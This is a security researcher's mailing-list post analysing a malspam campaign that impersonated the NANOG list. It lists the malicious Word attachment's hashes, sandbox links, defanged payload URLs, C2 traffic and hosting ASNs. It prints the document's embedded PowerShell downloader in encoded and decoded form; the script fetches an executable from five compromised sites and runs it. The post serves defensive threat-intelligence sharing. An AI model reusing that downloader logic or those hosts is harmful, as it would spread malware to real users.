*Just an FYI, the obfuscated URLs and IPs below are malicious.* This is apparently (?) part of a wave of spoofed malspams impersonating messages with ‘weaponized' attachments sent to the NANOG (North American Network Operators Group) mailing list. Background: https://mailman.nanog.org/pipermail/nanog/2019-May/101140.html Details: Date: Wed, 29 May 2019 10:03:04 -0500 From: "NANOG" <Helene.Rouleau@paral.ca> To: "Paul Ferguson" <fergdawgster@mykolab.com> Subject: Mykolab Ref Id: I32560 X-Authenticated-Sender: s214.panelboxmanager.com Return-Path: <Helene.Rouleau@paral.ca> Attachment: "ATTACHMENT 654860 I32560.doc" MD5: 49fbc31d5e46d83c4741d64a1c268e8d SHA-1: 62b00133e2a78063b76a473a9c0b42a00b3042b8 SHA256: 8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5 File Type: MS Word Document Magic CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: North Dakota, Subject: Maine, Author: Darrell Hammes, Comments: Tunisia policy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 28 12:55:00 2019, Last Saved Time/Date: Tue May 28 12:55:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 90, Security: 0 SSDeep: 3072:t1b77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qSp8ALPmiuVvbIF/j9G5:Pb77HUUUUUUUUUUUUUUUUUUUT52VP61Z TRiD: Microsoft Word document (54.2%) Microsoft Word document (old ver.) (32.2%) Generic OLE2 / Multistream Compound File (13.5%) File Size: 136.38 KB Analysis: VT: https://www.virustotal.com/#/file/8c401ced381ce742105acae9b3d39d2f01681d4e3c... HA: https://www.hybrid-analysis.com/sample/8c401ced381ce742105acae9b3d39d2f01681... Joe Sandbox: https://www.joesandbox.com/analysis/136644/0/executive app.anny.run: https://app.any.run/tasks/18d747ef-42d6-40e8-b496-6eb54c5f5dac Embedded Powershell script does: WINWORD.EXE /n "C:\ATTACHMENT654860I32560.doc" (PID: 3256) powershell.exe powershell -nop -e JABDAGwASQBFAFkAawAyAD0AJwBhAEoATgBNAEsARgAzAGwAJwA7ACQAUgB3AFkASwBDAHYATwAgAD0AIAAnADkAMwA2ACcAOwAkAFEAQgBWAGEAZAA5AD0AJwBMADgASABEAHoATgAnADsAJAB3AFgAcABiAFYAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgB3AFkASwBDAHYATwArACcALgBlAHgAZQAnADsAJABHAEEAaQB6AHoANwA9ACcARABPAEkAbwBTAFQAJwA7ACQAVABiADkARQB1ADIASQByAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdABgAC4AVwBlAEIAQwBgAEwAYABJAEUATgB0ADsAJABrAHUAVwBfAG8ANwBTADUAPQAnAGgAdAB0AHAAOgAvAC8AYwBlAG8ALgBjAGEAbABjAHUAcwAuAGMAbwBtAC8AcABvAHMAdABuAGUAdwBvAC8AUgB3AGgAdgBPAGwAWgBJAHMALwBAAGgAdAB0AHAAOgAvAC8AbABhAHMAdABtAGkAbgB1AHQAZQBsAG8AbABsAGkAcABvAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGEARQBRAGwAcABwAGQAbABmAG8ALwBAAGgAdAB0AHAAOgAvAC8AawBhAHMAaABtAGkAcgBoAGEAYwBrAGUAcgBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB3AFEAWABoAG8AcgB0AFMAZgBKAC8AQABoAHQAdABwADoALwAvAG8AbQBlAGcAYQBjAG8AbgBzAHUAbAB0AG8AcgBpAGEAYwBvAG4AdABhAGIAaQBsAC4AYwBvAG0ALgBiAHIALwBzAGkAdABlAC8AdwBBAEsAawBiAE8ARQB3AHkALwBAAGgAdAB0AHAAOgAvAC8AbgBvAHQAdABzAHAAYwByAGUAcABhAGkAcgAuAGMAbwAuAHUAawAvAG4AeQBlAC8AaABLAFoAbABEAHYAUABmAHkALwAnAC4AUwBQAEwAaQBUACgAJwBAACcAKQA7ACQAbwA3AFYAQgBRAHQAbABiAD0AJwBPADEAWQBHAGIAMABwACcAOwBmAG8AcgBlAGEAYwBoACgAJAB6ADMAUgB2ADMAagB2ACAAaQBuACAAJABrAHUAVwBfAG8ANwBTADUAKQB7AHQAcgB5AHsAJABUAGIAOQBFAHUAMgBJAHIALgBEAG8AdwBOAEwATwBhAGQARgBJAEwARQAoACQAegAzAFIAdgAzAGoAdgAsACAAJAB3AFgAcABiAFYAcAApADsAJABpAFkAcABPAFkAYwBMAFYAPQAnAFgAMAA2AGoAUwBSADIANAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHcAWABwAGIAVgBwACkALgBsAEUAbgBnAFQASAAgAC0AZwBlACAAMgA5ADcAOAAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAFQAQQBSAFQAKAAkAHcAWABwAGIAVgBwACkAOwAkAFYASABUAE8AbwB1AHcAPQAnAEkAXwBXAGsAMgBiAEgAcgAnADsAYgByAGUAYQBrADsAJABFAFgAWABtAEIAbQBYAD0AJwByAGsARgBLAEMAVAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAEEAdQB0AGEAWQA9ACcAWQBuAFYAcQAzAEoASgAnAA== (PID: 2624,Additional Context: $ClIEYk2='aJNMKF3l';$RwYKCvO = '936';$QBVad9='L8HDzN';$wXpbVp=$env:userprofile+'\'+$RwYKCvO+'.exe';$GAizz7='DOIoST';$Tb9Eu2Ir=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;$kuW_o7S5='http://ceo.calcus[.]com/postnewo/RwhvOlZIs/@http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/@http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/@http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/@http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/'.SPLiT('@');$o7VBQtlb='O1YGb0p';foreach($z3Rv3jv in $kuW_o7S5){try{$Tb9Eu2Ir.DowNLOadFILE($z3Rv3jv, $wXpbVp);$iYpOYcLV='X06jSR24';If ((&('Get-'+'Ite'+'m') $wXpbVp).lEngTH -ge 29780) {[Diagnostics.Process]::START($wXpbVp);$VHTOouw='I_Wk2bHr';break;$EXXmBmX='rkFKCT'}}catch{}}$SAutaY='YnVq3JJ') 936.exe (PID: 2888) 24/72 936.exe --26d066e0 (PID: 2932) 24/72 enablerouting.exe (PID: 272) 'Payload quintet' from script above (compromised pages): http://ceo.calcus[.]com/postnewo/RwhvOlZIs/ http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/ http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/ http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/ http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/' Observed network activity: GET ceo.calcus[.]com/postnewo/RwhvOlZIs/ GET lastminutelollipop[.]com/wp-admin/aEQlppdlfo/ POST 31.12.67[.]62:7080/acquire/tlb/ringin/ Non-authoritative answer: Name: ceo.calcus[.]com Address: 68.183.65[.]234 Non-authoritative answer: Name: lastminutelollipop[.]com Address: 158.69.127[.]22 Non-authoritative answer: Name: kashmirhackers[.]com Address: 173.249.2[.]31 Non-authoritative answer: Name: omegaconsultoriacontabil[.]com.br Address: 74.63.242[.]18 Non-authoritative answer: Name: nottspcrepair[.]co.uk Address: 185.38.44[.]163 AS | IP | AS Name 14061 | 68.183.65[.]234 | DIGITALOCEAN-ASN - DigitalOcean, LLC, US (shared hosting) 16276 | 158.69.127[.]22 | OVH, FR (shared hosting) 51167 | 173.249.2[.]31 | CONTABO, DE (shared hosting) 46475 | 74.63.242[.]18 | LIMESTONENETWORKS - Limestone Networks, Inc., US (shared hosting) 33182 | 185.38.44[.]163 | DIMENOC - HostDime.com, Inc., US (shared hosting) 44099 | 31.12.67[.]62 | RUNISO-AS RUNISO Autonomous System, FR (appears to be stand-alone IP, no PTR record) FYI, - ferg — Paul Ferguson Principal, Threat Intelligence Gigamon Seattle, Washington, USA